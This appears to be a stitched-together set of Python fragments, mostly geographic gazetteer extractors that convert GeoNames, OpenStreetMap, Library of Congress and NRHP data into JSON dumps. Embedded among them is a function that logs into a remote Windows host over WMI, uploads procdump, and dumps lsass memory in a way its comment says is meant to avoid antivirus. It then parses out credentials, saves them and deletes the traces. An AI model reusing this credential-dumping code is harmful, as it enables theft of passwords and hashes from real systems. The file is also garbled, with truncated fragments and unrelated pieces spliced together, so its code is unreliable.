import gzip
import hashlib
import json
import time
import uuid


def generate_history(gz_file, dump_path, place_index):
    f = gzip.open(gz_file, 'rb')
    uid = uuid.uuid4()
    unique_name = uid.hex
    dump = Dump(dump_path + "/historydump/history" + unique_name + ".%04d.json.gz")
    histindex = place_index + "-history"  # e.g. gazetest2-history

    for line in f:
        index_json = line
        doc_id = json.loads(index_json)["index"]["_id"]
        doc_json = next(f)  # the document line follows its index-action line
        doc = json.loads(doc_json)
        digest = hashlib.sha1(json.dumps(doc, sort_keys=True).encode("utf-8")).hexdigest()

        # Save history (the records tied to a place which have revisions).
        history_doc = {
            "index": place_index,
            "type": "place",
            "id": doc_id,
            "revisions": [{
                "user_created": "ETL",
                "created_at": time.time(),
                "digest": digest
            }]
        }
        dump.write_bulk(histindex, "place", doc_id, history_doc)

    f.close()
    dump.close()
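# A minimal entry-point sketch, mirroring the sibling extractors in this repo;
# the script name and argument order in the usage line below are assumptions.
if __name__ == "__main__":
    import sys

    gz_file, dump_path, place_index = sys.argv[1:4]
    generate_history(gz_file, dump_path, place_index)

#python history.py /path/to/bulk_dump.json.gz /path/to/gz_dump gazetest2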
"source": source, "alternate": alternates, "updated": updated, "uris": [uri], "relationships": [], "timeframe": timeframe, "admin": [], "address": address } dump.write(uri, place) if __name__ == "__main__": shapefile, dump_path = sys.argv[1:3] #simplify_tolerance = .01 # ~ 11km (.001 = 111m) simplify_tolerance = None uri_name = "http://maps.nypl.org/warper/layers/861" dump_basename = os.path.basename(shapefile) dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz") extract_shapefile(shapefile, uri_name, simplify_tolerance) dump.close() #python shapefile.py "/path/to/shapefile/buildings.shp" /path/to/gz_dump #python nyc_perris_digitizer_csv.py ../../../GazetteerData/Manhattan\ Buildings\ Perris\ 10_23_2012/FinalCleanedData_Perris1854_tab.csv nydump
"updated": updated, "uris":[uri], "relationships": [], "timeframe":timeframe, "admin":[] } dump.write(uri, place) if __name__ == "__main__": csvfile, dump_path = sys.argv[1:3] #simplify_tolerance = .01 # ~ 11km (.001 = 111m) simplify_tolerance = None uri_name = "http://nrhp.focus.nps.gov?referenceNumber:" #http://nrhp.focus.nps.gov/natregadvancedsearch.do?referenceNumber:73001435 dump_basename = os.path.basename(csvfile) dump = Dump(dump_path + "/json/"+ dump_basename + ".%04d.json.gz") extract_geojson(csvfile, uri_name, simplify_tolerance) dump.close() #python nrhp.py nhrp.csv nrhpdump #python nrhp.py "/path/to/directory" /path/to/gz_dump2
def run(self, addr, osArch='64'):
    dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain,
                          self.__lmhash, self.__nthash, self.__aesKey,
                          oxidResolver=True, doKerberos=self.__doKerberos,
                          kdcHost=self.__kdcHost)
    # Compute the timestamp up front so the cleanup code in finally can always
    # reference it; guard the dump handle for the same reason.
    dt = datetime.now().strftime("%m-%d-%Y_%H-%M-%S")
    dump = None
    try:
        iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
        iWbemLevel1Login.RemRelease()
        win32Process, _ = iWbemServices.GetObject('Win32_Process')
        self.shell = RemoteShell(self.__share, win32Process, self.__smbConnection)

        # Upload procdump
        procpath = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),
                                'misc', 'procdump', 'procdump%s.exe' % (osArch))
        logging.info("%s Uploading procdump to %s..." % (debugBlue, addr))
        if logging.getLogger().getEffectiveLevel() > 10:
            with suppress_std():
                self.shell.do_put(procpath)
        else:
            self.shell.do_put(procpath)

        # Execute procdump silently, resolving lsass's PID first to avoid AVs as much as possible
        cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do procdump{}.exe -accepteula -ma ^%B C:\\{}.dmp""".format(osArch, addr + "_" + dt)
        logging.info("%s Executing procdump on %s..." % (debugBlue, addr))
        if logging.getLogger().getEffectiveLevel() > 10:
            with suppress_std():
                self.shell.onecmd(cmd)
        else:
            self.shell.onecmd(cmd)

        # Create the dump's file descriptor so it can be parsed remotely
        logging.info("%s Creating dump's file descriptor on %s..." % (debugBlue, addr))
        logging.info("%s Parsing %s's dump remotely..." % (debugBlue, addr))
        dump = Dump(self.__smbConnection, """{}.dmp""".format(addr + "_" + dt))
        credentials = parseDump(dump)
        if credentials is not None:
            print_credentials(addr, credentials)
            write_credentials(addr, credentials)
    finally:
        # Clean the remote machine (dump & procdump)
        logging.info("%s Closing dump file on %s..." % (debugBlue, addr))
        if dump is not None:  # the dump may never have been opened
            dump.close()
        logging.info("%s Deleting procdump on %s..." % (debugBlue, addr))
        if logging.getLogger().getEffectiveLevel() > 10:
            with suppress_std():
                self.shell.onecmd("del procdump%s.exe" % (osArch))
        else:
            self.shell.onecmd("del procdump%s.exe" % (osArch))
        logging.info("%s Deleting dump on %s..." % (debugBlue, addr))
        if logging.getLogger().getEffectiveLevel() > 10:
            with suppress_std():
                self.shell.onecmd("del %s.dmp" % (addr + "_" + dt))
        else:
            self.shell.onecmd("del %s.dmp" % (addr + "_" + dt))
        if self.__smbConnection is not None:
            self.__smbConnection.logoff()
        dcom.disconnect()
        sys.stdout.flush()
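# Hypothetical invocation sketch: the enclosing class and its constructor are
# not part of this excerpt, so the names below are assumptions only.
#   dumper = ProcdumpRunner(username, password, domain, ...)  # hypothetical wrapper class
#   dumper.run('192.168.1.10', osArch='64')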
def extract_geonames(data_path, dump_path):
    alt_names = tab_file(data_path + "/alternateNames.sorted.txt", columns["alternate"])
    geonames = tab_file(data_path + "/allCountries.sorted.txt", columns["geoname"])
    dump = Dump(dump_path + "/geonames/geonames.%04d.json.gz")

    extra_alt_name = {}
    for geoname in geonames:
        alt_name_list = []

        # Both inputs are sorted by geoname_id, so this is a streaming merge:
        # pick up the alternate name read past the end of the previous group,
        # then consume alt_names until the next group begins.
        if extra_alt_name.get("geoname_id") == geoname["geoname_id"]:
            alt_name_list.append(extra_alt_name)
            extra_alt_name = {}
        for alt_name in alt_names:
            if alt_name["geoname_id"] == geoname["geoname_id"]:
                alt_name_list.append(alt_name)
            else:
                extra_alt_name = alt_name
                break
        geoname["alternate_names"] = alt_name_list

        try:
            for col in ("latitude", "longitude"):
                geoname[col] = float(geoname[col])
        except ValueError:
            # busted coordinates
            continue
        centroid = [geoname["longitude"], geoname["latitude"]]

        population = None
        try:
            population = int(geoname["population"])
        except ValueError:
            pass

        uri = "http://geonames.org/" + geoname["geoname_id"]

        names = []
        alt_name_list.append({
            "name": geoname["name"],
            "lang": "",
            "type": "preferred"
        })
        for alt_name in alt_name_list:
            name_type = ""
            if alt_name.get("is_colloquial"):
                name_type = "colloquial"
            if alt_name.get("is_historic"):
                name_type = "historic"
            if alt_name.get("is_preferred"):
                name_type = "preferred"
            if alt_name.get("is_short"):
                name_type = "short"
            alt_name = {
                "lang": alt_name["lang"],
                "type": name_type,
                "name": alt_name["name"]
            }
            names.append(alt_name)
            ascii_name = transliterate(alt_name)
            if ascii_name:
                names.append(ascii_name)

        place = {
            "name": geoname["name"],
            "centroid": centroid,
            "feature_code": geoname["feature_code"],
            "geometry": {"type": "Point", "coordinates": centroid},
            "is_primary": True,
            "source": geoname,
            "alternate": names,
            "updated": geoname["changed_at"],
            "population": population,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)
    dump.close()
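# A minimal entry-point sketch, mirroring the sibling extractors; the script
# name in the usage line is an assumption.
if __name__ == "__main__":
    import sys

    data_path, dump_path = sys.argv[1:3]
    extract_geonames(data_path, dump_path)

#python geonames.py /path/to/geonames_data /path/to/gz_dump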
import datetime
import json


def extract_lc_auth(data_path, dump_path):
    dump = Dump(dump_path + "/lc_auth/lc_auth.%04d.json.gz")
    for line in open(data_path):
        auth = json.loads(line)

        if "isMemberOfMADSScheme" in auth:
            del auth["isMemberOfMADSScheme"]
        if "adminMetadata" in auth:
            del auth["adminMetadata"]

        alt_names = []
        for label in get_labels(auth.get("hasVariant")):
            alt_names.append({"name": label})
        for label in get_labels(auth.get("hasEarlierEstablishedForm")):
            alt_names.append({"name": label, "type": "historical"})

        geom = fcode = None
        has_source = auth.get("hasSource")
        if has_source:
            note = has_source.get("citation-note")
            if note:
                lat = coords_to_dms(ns_coords, note)
                lon = coords_to_dms(ew_coords, note)
                if lat and lon:
                    geom = {"type": "Point", "coordinates": [lon, lat]}
                # search the citation-note for a feature code
                fcode = extract_fcode(note)
            if not fcode:
                source = has_source.get("citation-source", "")
                fcode = extract_fcode(source)
        if not fcode:
            fcode = "AUTH"

        uri = auth["id"]
        if "authoritativeLabel" not in auth:
            continue

        updated = datetime.datetime.utcnow().replace(second=0, microsecond=0).isoformat()

        # Copy over only the whitelisted source fields.
        auth_source = {
            "type": [],
            "id": "",
            "authoritativeLabel": "",
            "note": "",
            "editorialNote": ""
        }
        for key in auth_source.keys():
            if key in auth:
                auth_source[key] = auth[key]

        place = {
            "name": auth["authoritativeLabel"],
            "feature_code": fcode,
            "alternate": alt_names,
            "is_primary": True,
            "updated": updated,
            "source": auth_source,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        if geom:
            place["geometry"] = geom
            place["centroid"] = geom["coordinates"]
        else:
            place["geometry"] = {}
            place["centroid"] = []
        dump.write(uri, place)
    dump.close()
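# A minimal entry-point sketch, following the other extractors; the script and
# input-file names in the usage line are assumptions.
if __name__ == "__main__":
    import sys

    data_path, dump_path = sys.argv[1:3]
    extract_lc_auth(data_path, dump_path)

#python lc_auth.py /path/to/lc_authorities.json /path/to/gz_dump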
            names.append(ascii_name)

        # Keep only non-empty source columns, dropping the bulky geometry fields.
        source = dict(row)
        for key in list(source.keys()):  # list() so we can delete while iterating
            if not source[key] or key in ("geojson", "centroid_x", "centroid_y", "way"):
                del source[key]

        place = {
            "name": preferred_name,
            "centroid": centroid,
            "feature_code": feature_code,
            "geometry": geometry,
            "is_primary": True,
            "source": source,
            "alternate": names,
            "updated": row["timestamp"],
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)


if __name__ == "__main__":
    import sys

    database, dump_path = sys.argv[1:3]
    dump = Dump(dump_path + "/osm/osm.%04d.json.gz")
    extract_osm(database, "planet_osm_point", "node", dump)
    extract_osm(database, "planet_osm_polygon", "way", dump)
    dump.close()
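# Hypothetical usage, mirroring the other scripts' trailing comments; the
# database name is a placeholder:
#python osm.py osm_database /path/to/gz_dump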